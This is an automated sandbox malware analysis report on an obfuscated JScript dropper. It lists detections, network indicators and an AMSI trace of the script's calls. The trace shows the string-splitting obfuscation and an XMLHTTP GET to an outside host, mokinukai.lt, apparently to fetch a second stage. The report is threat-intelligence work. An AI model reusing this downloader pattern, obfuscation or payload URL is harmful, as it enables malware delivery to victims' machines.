Windows Analysis Report
G9Z66ZF3Y370FN9E.js

Overview

General Information

Sample name: G9Z66ZF3Y370FN9E.js
Analysis ID: 1541954
MD5: b4b15b179e04cc1c1c41912139cf5495
SHA1: 5ecd8c64642adaf1e3a351ce1691308548ff081e
SHA256: 281d7a64e1556e677d4c355bd7521ce7d1e9265e27cd255ca9f530114dde9e37
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: G9Z66ZF3Y370FN9E.js Avira: detected
Multi AV Scanner detection for submitted file
Source: G9Z66ZF3Y370FN9E.js ReversingLabs: Detection: 68%

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 79.98.25.1 80 Jump to behavior
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Source: G9Z66ZF3Y370FN9E.js Argument value : ['"GET","http://mokinukai.lt/x4szqe",false'] Go to definition
Source: G9Z66ZF3Y370FN9E.js Argument value : ['"User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"'] Go to definition
Source: G9Z66ZF3Y370FN9E.js Return value : ['"send"'] Go to definition
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"', '"send"'] Go to definition
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"', '"send"'] Go to definition
Source: G9Z66ZF3Y370FN9E.js Return value : ['"MSXML2.XMLHTTP"'] Go to definition
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.98.25.1 79.98.25.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /x4szqe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: mokinukai.ltConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 09:06:15 GMTServer: ApacheCache-control: max-age=300Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1756Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 58 bb 92 1b c7 15 cd 5d e5 7f 68 c1 89 24 ef 00 d8 a5 48 2d 29 00 2e bb 56 65 b3 4c b2 60 d1 54 ea 6a 60 1a c0 c5 f4 74 8f fb 81 25 18 39 71 e8 c8 c1 96 c3 8d 19 2a 57 b4 f8 11 7f 89 cf 9d 07 30 0b 80 8f 02 e5 57 34 3d d3 dd e7 3e fa 3e 4e cf e0 b3 d4 4e c3 ba 50 62 11 72 3d fa f9 cf 06 f5 53 0c 16 4a a6 3c 10 83 5c 05 89 f9 50 24 ea cf 91 56 c3 ce d4 9a a0 4c 48 78 63 47 d4 6f c3 4e 50 af 43 8f f7 7f 23 a6 0b e9 bc 0a c3 18 66 c9 65 a7 05 63 64 ae 86 1d 67 27 36 f8 d6 56 63 c9 a4 ea f5 99 30 76 66 b5 b6 d7 87 7b 56 a4 ae 0b eb 42 6b d7 35 a5 61 31 bc ec f7 cf 44 2e 5f 53 1e f3 c4 4f a5 56 c3 f3 c3 ed 61 a1 72 95 4c ad b6 ae 85 f0 8b 7e ff e1 54 3e 68 2f a7 a0 f2 c2 d9 62 d8 a1 5c ce db f6 b1 0b fc 93 5e 4f 7a 98 e6 bb b4 ea ea d0 2b 17 f9 5e 58 c4 7c 62 24 e9 6e 61 e6 6d 38 86 52 2e ac 87 1d 3b 7f f2 a9 88 9a 4c 26 9c d2 d0 0d 18 1d e1 e9 8d f2 c3 ce e3 47 af 1f 3f ea 88 85 53 b3 f7 63 f2 ae a3 70 b2 28 b4 4a 82 8d d3 45 52 41 7f 02 98 0f 6b ad fc 42 29 9c 15 87 48 1d 19 53 ef df 0b 9b aa 99 8c 3a 74 79 5d 05 19 28 68 35 ca 6d 46 26 66 92 b0 48 24 e2 d5 e6 47 a7 e6 e4 83 8b 36 48 2f 52 9b 2b 83 67 22 9e c2 ab ce a8 60 c5 8a de d0 52 0e 7a 15 00 47 73 af 09 e7 c1 c4 a6 6b 0c 10 ea 9f 25 89 98 00 ca 08 9e 54 4e 24 49 39 c1 92 e5 44 2b 21 35 cd cd 70 aa 18 57 4c 95 d6 85 4c 53 32 f3 61 bf 7c f3 85 9c 96 6f a5 b6 d8 e4 aa 01 46 69 3d 12 03 9a 39 c4 9f f0 6e fa 0e b3 2b d9 5d ce 9b 8e a8 22 fa eb 47 97 50 89 e6 8b 30 3c ef f7 85 9f 3a e4 04 4b 32 56 94 70 13 eb b0 07 82 07 bd 0a bf 11 dc 6b 24 63 e4 76 6a 41 a1 06 f0 e2 ab 51 b9 6a bb 00 03 36 76 e7 12 65 d2 3d 87 b4 3c c5 de 3b f0 d3 4e eb 9f c2 63 8b f3 7b 47 8e a3 3b df ce 15 ef 37 54 ac 2a 05 82 2d 76 c0 b5 7a 0f fb 97 0d cc 55 1d 32 83 c9 9e a4 c9 48 f8 bb 9b 2c 87 8e 92 44 dc 8b b4 bd f8 b2 5e 64 9a 60 2a de a5 4b a3 20 27 36 b7 14 ad 40 e2 47 b1 76 48 7e d2 c8 60 21 b3 b0 5e 55 18 13 45 a2 90 00 dc dc f2 ab 91 31 b5 4b 54 2e ea ee 9b 08 47 5c 8c 5e 58 87 7a 24 a0 a1 53 54 04 12 6d 7d 7f 05 d7 5c 1c b8 46 0c a2 6e 86 9c 95 a3 b1 23 4f cb 68 32 46 2a 1c 21 18 e5 ca 42 0b 9f ad 1d 8c 18 48 11 a4 9b a3 5a ff 09 7e db cb d0 ca 42 99 37 d1 da 19 55 5f 36 3f a0 f8 78 94 4a bb 54 83 9e 1c 7d d3 96 18 48 79 c1 e8 14 73 12 9d b1 f4 5a c6 b9 45 fa 43 28 39 aa 54 31 d1 3a 9b de fd 15 39 32 1a 6b 79 f7 37 92 b1 db ed 22 a4 ef a3 b5 f7 94 c9 ce ba af 24 c2 8a 72 ec 86 d7 b1 a2 90 d1 97 2b f2 f5 3c c4 ac 42 7d d1 b8 8d 31 b7 0e ee ed fc b3 73 da 98 41 33 45 81 72 98 d6 d4 94 c2 c9 f4 ee c6 8b 95 a2 0c ce 47 21 17 e7 1c 63 c7 0f eb a9 da dc 66 16 3a 64 91 75 0a 52 17 64 3e ee cc 5e ae d0 2b 60 10 64 57 db 50 63 bd 90 6e 22 05 ac 92 84 63 b1 3e 70 58 7a f1 b9 34 73 dd 65 fb ae d5 a4 f9 ce 16 7e 21 fe f9 97 bf 63 3f 47 d8 1c 1e 63 0f 21 e2 36 6f 5
Source: global traffic HTTP traffic detected: GET /x4szqe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: mokinukai.ltConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: mokinukai.lt
Source: wscript.exe, 00000000.00000003.2068326113.000002A782FE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068474138.000002A781568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070594412.000002A78156E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068376106.000002A78155F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069190978.000002A782FE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mokinukai.lt/x4szqe
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/default.css
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/footer.html
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/header.html
Source: x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/images/icon.png
Source: x4szqe[1].htm.0.dr String found in binary or memory: https://assets.iv.lt/images/thumbnail.png
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068173045.000002A782FED000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://klientams.iv.lt/
Source: wscript.exe, 00000000.00000002.2070858012.000002A78354A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069019790.000002A78354A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/domenai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/el-pasto-filtras/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/sertifikatai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/talpinimo-planai/
Source: wscript.exe, 00000000.00000003.2068853819.000002A783645000.00000004.00000020.00020000.00000000.sdmp, x4szqe[1].htm.0.dr String found in binary or memory: https://www.iv.lt/vps-serveriai/

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: G9Z66ZF3Y370FN9E.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal88.evad.winJS@1/1@1/1
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\x4szqe[1].htm Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: G9Z66ZF3Y370FN9E.js ReversingLabs: Detection: 68%
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\8690.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:2467 o: f:ExpandEnvironmentStrings a0:%22%25TEMP%25%2F%22");IWshShell3.ExpandEnvironmentStrings("%TEMP%/");IWshShell3._00000000();ITextStream.WriteLine(" exit:2467 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%2F%22");ITextStream.WriteLine(" entry:2489 o:%22M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:split r:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP");ITextStream.WriteLine(" entry:11 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP f:join r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" exit:2489 o:%22M%2CS%2CX%2CM%2CL%2C2%2C.%2CX%2CM%2CL%2CH%2CT%2CT%2CP%22 f:DeadAstronautInSpaceBXv3 r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" entry:2581 o:%22G%2CE%2CT%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:G%2CE%2CT f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:G%2CE%2CT f:split r:G%2CE%2CT");ITextStream.WriteLine(" entry:11 o:G%2CE%2CT f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:G%2CE%2CT f:join r:%22GET%22");ITextStream.WriteLine(" exit:2581 o:%22G%2CE%2CT%22 f:DeadAstronautInSpaceBXv3 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2575 o: f:open a0:%22GET%22 a1:%22http%3A%2F%2Fmokinukai.lt%2Fx4szqe%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://mokinukai.lt/x4szqe", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:2575 o: f:open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2592 o: f:setRequestHeader a0:%22User-Agent%22 a1:%22Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.0)%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:2592 o: f:setRequestHeader r:undefined");ITextStream.WriteLine(" entry:2604 o:%22s%2Ce%2Cn%2Cd%22 f:DeadAstronautInSpaceBXv3");ITextStream.WriteLine(" exec:8 f:");ITextStream.WriteLine(" entry:13 o:s%2Ce%2Cn%2Cd f:split a0:%22%2C%22");ITextStream.WriteLine(" exit:13 o:s%2Ce%2Cn%2Cd f:split r:s%2Ce%2Cn%2Cd");ITextStream.WriteLine(" entry:11 o:s%2Ce%2Cn%2Cd f:join a0:%22%22");ITextStream.WriteLine(" exit:11 o:s%2Ce%2Cn%2Cd f:join r:%22send%22");ITextStream.WriteLine(" exit:2604 o:%22s%2Ce%2Cn%2Cd%22 f:DeadAstronautInSpaceBXv3 r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:2600 o: f:send");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000000.00000002.2070819715.000002A783520000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0RX
Source: wscript.exe, 00000000.00000003.2069364794.000002A78355B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070610524.000002A78157D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068495136.000002A781577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2070922645.000002A78355E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068474138.000002A781568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069019790.000002A78355A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068376106.000002A78155F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 79.98.25.1 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
79.98.25.1
 mokinukai.lt Lithuania
62282 RACKRAYUABRakrejusLT true

Contacted Domains

Name IP Active
mokinukai.lt 79.98.25.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://mokinukai.lt/x4szqe true
    		unknown